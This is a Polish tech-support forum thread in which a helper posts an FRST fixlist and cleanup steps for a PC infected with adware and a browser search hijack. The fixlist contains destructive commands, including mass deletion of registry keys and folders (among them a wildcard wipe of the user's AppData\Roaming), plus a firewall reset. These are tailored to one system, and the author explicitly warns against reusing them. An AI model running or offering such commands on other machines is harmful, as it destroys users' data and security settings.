HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-2195696607-1004561068-2284675860-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> {0191A6B0-1154-4C22-9182-23A95BBE92D9} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKU\S-1-5-21-2195696607-1004561068-2284675860-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKU\S-1-5-21-2195696607-1004561068-2284675860-1000 -> {0191A6B0-1154-4C22-9182-23A95BBE92D9} URL = hxxp://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-2195696607-1004561068-2284675860-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-2195696607-1004561068-2284675860-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
Toolbar: HKU\S-1-5-21-2195696607-1004561068-2284675860-1000 -> Brak nazwy - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Brak pliku
CHR HKLM\...\Chrome\Extension: [jeaohhlajejodfjadcponpnjgkiikocn] - 
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - 
CHR HKU\S-1-5-21-2195696607-1004561068-2284675860-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fkkcgfbgohboipdhliafmacjnhjbhmim] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - 
CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=pl-pl
CHR DefaultSearchURL: Default -> hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUTFbG3TDcHPXcZi2wJDROuM6HIYLtvb5wuzuFPdiccLRPqyfNMVujTKv4KKQI_t1PGJSRcJQn79oZyo2igbyrHm5AFDU5-2ZPOk0SNZ_lArGVqx9duzU6QCqkFxyd_VT3JDu8J2cBCV2MOqIJ&q={searchTerms}
CHR DefaultSearchKeyword: Default -> feed.sonic-search.com
CHR DefaultSuggestURL: Default -> hxxps://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command={searchTerms}
DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I
DeleteKey: HKCU\Software\dobreprogramy
DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\ACTION_SVC
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\LogMeIn Hamachi Ui
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SBRegRebootCleaner
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main
DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main
DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main
DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes
DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes
DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes
C:\Program Files\aotech
C:\Program Files (x86)\baidu
C:\Program Files (x86)\Lenovo
C:\Program Files (x86)\Opera
C:\Program Files (x86)\ppt
C:\Program Files (x86)\TData
C:\Program Files\Common Files\yuorxhac.exe
C:\Program Files\Common Files\oi2l4pal
C:\ProgramData\72b4b938-60b1-0
C:\ProgramData\72b4b938-64d3-1
C:\ProgramData\Airtostrong
C:\ProgramData\kingsoft
C:\ProgramData\TEMP
C:\tmp
C:\uninst
C:\Users\user\AppData\Local\subhex.dat
C:\Users\user\AppData\Local\subhex.exe.config
C:\Users\user\AppData\Local\AION
C:\Users\user\AppData\Local\CleanBrowserApp
C:\Users\user\AppData\Local\Lenovo
C:\Users\user\AppData\Local\Mozilla
C:\Users\user\AppData\Local\Opera Software
C:\Users\user\AppData\Local\PPTAssist
C:\Users\user\AppData\Local\Tempfolder
C:\Users\user\AppData\Roaming\*.*
C:\Users\user\AppData\Roaming\AION
C:\Users\user\AppData\Roaming\CleanBrowser
C:\Users\user\AppData\Roaming\HerlhFepkae
C:\Users\user\AppData\Roaming\kingsoft
C:\Users\user\AppData\Roaming\Mozilla
C:\Users\user\AppData\Roaming\NystBopgu
C:\Users\user\AppData\Roaming\Opera Software
C:\Users\user\AppData\Roaming\WarThunder
C:\Users\user\Desktop\Kornela\Continue installation .lnk
C:\Users\user\Desktop\Błażeja\LogMeIn Hamachi.lnk
C:\Users\user\Downloads\dsound.dll
C:\Windows\System32\Tasks\Lenovo
C:\Windows\system32\xhd
C:\Windows\SysWOW64\Number of results
CMD: netsh advfirewall reset
EmptyTemp:

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

2. Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście Metric Collection SDK 35 > Dalej.

3. Wyczyść Google Chrome:

Zresetuj synchronizację (o ile włączona): KLIK.
Ustawienia > karta Rozszerzenia > odinstaluj MSN Homepage.
Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.

4. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER:

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools

Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff

6. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Edytowane 2 Czerwca 2016 przez picasso
Temat zostaje zamknięty z powodu braku odpowiedzi. //picasso

Zaloguj się

Zawirusowany komputer, chiński program w starcie

Rekomendowane odpowiedzi

Chmury

Odnośnik do komentarza

picasso

Odnośnik do komentarza

Ostatnio przeglądający 0 użytkowników

Przeglądaj

Cała aktywność